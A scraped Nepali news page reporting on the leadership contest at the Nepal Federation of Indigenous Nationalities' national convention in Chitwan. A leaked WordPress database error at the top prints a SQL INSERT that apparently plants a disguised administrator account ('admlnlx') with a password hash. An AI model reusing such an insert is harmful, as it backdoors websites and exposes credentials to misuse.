WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bfnh.lc4420z4tGNyTMVb0/dpNNoB/.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 11:44:51', '', 'admlnlx', 'admlnlx')
चितवन, पुस ४–
चितवनको नारायणगढमा जारी नेपाल आदिवासी जनजाति महासंघको नवौं राष्ट्रिय महाधिवेशनमा अहिले केहीबेर अघि बन्द सत्र सुरु भएको छ ।
नयाँ नेतृतवको विषयमा विवाद भएपछि बन्द सत्र सुरु हुन सकेको थिएन । बन्द सत्र सुरु भएपछि हिजो पेश गरिएको महासचिव पेम्बा भोटेको प्रतिवेदन र कोषाध्यक्ष जगत बरामको प्रतिवेदन ताली बजाएर पारित गरिएको छ । अहिले बन्द सत्रमा चितवन घोषणा पत्र माथि छलफल भईरहेको छ ।
नयाँ नेतृत्वका लागि नेपाली काँग्रेस, नेकपा एमाले र माओवादी केन्द्रको उम्मेदवार तय भएपछि शीर्ष नेताहरुको दवाबमा बन्द सत्र नै अवरुद्ध भएको थियो ।
नेपाली काँग्रेसबाट हालका कोषाध्यक्ष जगत बराम, नेकपा एमालेबाट हालका उपाध्यक्ष सूर्य भुजेल र माओवादीबाट नत्यिानन्द ताजपुरिया उम्मेदवारी दिने तयारी छ । ताजपुरियालाई संघीय समाजवादी फोरमलगायतको साना दल निकटका प्रतिनिधिहरुको समर्थन रहेको स्रोतको भनाई छ ।
नयाँ नेतृत्वका लागि कुल ५६ भोट रहेको छ ।